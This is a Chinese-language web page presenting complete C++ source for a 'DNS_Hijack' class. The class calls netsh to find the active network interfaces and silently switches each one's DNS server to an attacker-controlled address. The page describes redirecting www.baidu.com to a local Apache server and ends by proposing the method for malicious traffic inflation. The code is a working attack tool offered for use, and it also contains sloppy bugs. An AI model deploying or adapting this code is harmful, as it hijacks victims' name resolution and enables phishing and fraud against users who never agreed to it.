当前位置 主页 > 本站WEB程序 > 安全 > IIS7网站监控 >
###C/C++实现DNS劫持:
程序所需头文件和命名空间:
#include <iostream> #include <string> #include <windows.h> #include <stdlib.h> #include <list> #include <io.h> using namespace std;1234567
获取本机可用网卡
void Get_using_interface()
{
system("netsh interface show interface > interface_info.txt");
FILE* fp = fopen("interface_info.txt", "rb");
const int file_size = filelength(fileno(fp));
char* buff = (char*)malloc(sizeof(char)*file_size);
if (fp) {
fread(buff, 1, file_size, fp);
str = buff;
free(buff);
replaceA_to_B(str, "-------------------------------------------------------------------------\r\n", "");
Split(str, "\r\n", interface_using);
Spilt_space(interface_using);
}
}
void Spilt_space(list<string> list_str) {
for (list<string>::iterator itor = list_str.begin(); itor != list_str.end(); itor++) {
cout << *itor << endl;
string::size_type first_variable = (*itor).find("已启用");
string::size_type second_variable = (*itor).find("已连接");
string::size_type third_variable = (*itor).find("专用");
if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) {
string info = *itor;
last_get_interface_using.push_back(info.substr(55,info.length()));
}
}
}
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
std::size_t found = S.find(A);
while (std::string::npos != found) {
S.replace(found, A.length(), B);
found = S.find(A, found + 1);
void Split(const string& src, const string& separator, list<string>& dest)
{
string str = src;
string substring;
string::size_type start = 0, index;
dest.clear();
index = str.find_first_of(separator, start);
do
{
if (index != string::npos)
{
substring = str.substr(start, index - start);
dest.push_back(substring);
start = index + separator.size();
index = str.find(separator, start);
if (start == string::npos) break;
}
} while (index != string::npos);
//the last part
substring = str.substr(start);
dest.push_back(substring);
}1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859
构造函数实现:
DNS_Hijack(string DNS="192.168.1.233")
{
Get_using_interface();
for(list<string>::iterator itor = last_get_interface_using.begin();itor!=last_get_interface_using.end();itor++)
{
string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS;
cout << str;
system(str.c_str());
}
}1234567891011
完整代码:
#include <iostream>
#include <string>
#include <windows.h>
#include <stdlib.h>
#include <list>
#include <io.h>
using namespace std;
class DNS_Hijack {
private:
list<string> interface_using; //获取本地可用网卡
list<string> last_get_interface_using;
private:
string str; //存储文件读取后的内容
string DNS;
private:
void Get_using_interface()
{
system("netsh interface show interface > interface_info.txt");
FILE* fp = fopen("interface_info.txt", "rb");
const int file_size = filelength(fileno(fp));
char* buff = (char*)malloc(sizeof(char)*file_size);
if (fp) {
fread(buff, 1, file_size, fp);
str = buff;
free(buff);
replaceA_to_B(str, "-------------------------------------------------------------------------\r\n", "");
Split(str, "\r\n", interface_using);
Spilt_space(interface_using);
}
}
private:
void Spilt_space(list<string> list_str) {
for (list<string>::iterator itor = list_str.begin(); itor != list_str.end(); itor++) {
cout << *itor << endl;
string::size_type first_variable = (*itor).find("已启用");
string::size_type second_variable = (*itor).find("已连接");
string::size_type third_variable = (*itor).find("专用");
if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) {
string info = *itor;
last_get_interface_using.push_back(info.substr(55,info.length()));
}
}
}
private:
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
std::size_t found = S.find(A);
while (std::string::npos != found) {
S.replace(found, A.length(), B);
found = S.find(A, found + 1);
}
}
private:
void Split(const string& src, const string& separator, list<string>& dest)
{
string str = src;
string substring;
string::size_type start = 0, index;
dest.clear();
index = str.find_first_of(separator, start);
do
{
if (index != string::npos)
{
substring = str.substr(start, index - start);
dest.push_back(substring);
start = index + separator.size();
index = str.find(separator, start);
if (start == string::npos) break;
}
} while (index != string::npos);
//the last part
substring = str.substr(start);
dest.push_back(substring);
}
public:
DNS_Hijack(string DNS="192.168.1.233")
{
Get_using_interface();
for(list<string>::iterator itor = last_get_interface_using.begin();itor!=last_get_interface_using.end();itor++)
{
string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS;
cout << str;
system(str.c_str());
}
}
};
int main()
{
DNS_Hijack* one = new DNS_Hijack("192.168.1.20");
system("pause");
return 0;
}123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103
现在我在虚拟机win2003,ip地址为:192.168.1.20中搭建了一台DNS服务器,并将所有域名为www.baidu.com的请求都解析到我内网中的一台搭建了Apache服务器上。
这个时候我对www.baidu.com的请求就会通过我内网中的DNS服务器解析成我Apache服务器的地址。
也就是说真正的百度的ip我们已经无法得到,通过nslookup也可以看出,DNS被劫持。
实验效果:
我们也可以通过这种方法让用户访问特定的URL从而实现恶意刷取网站PE量的效果。
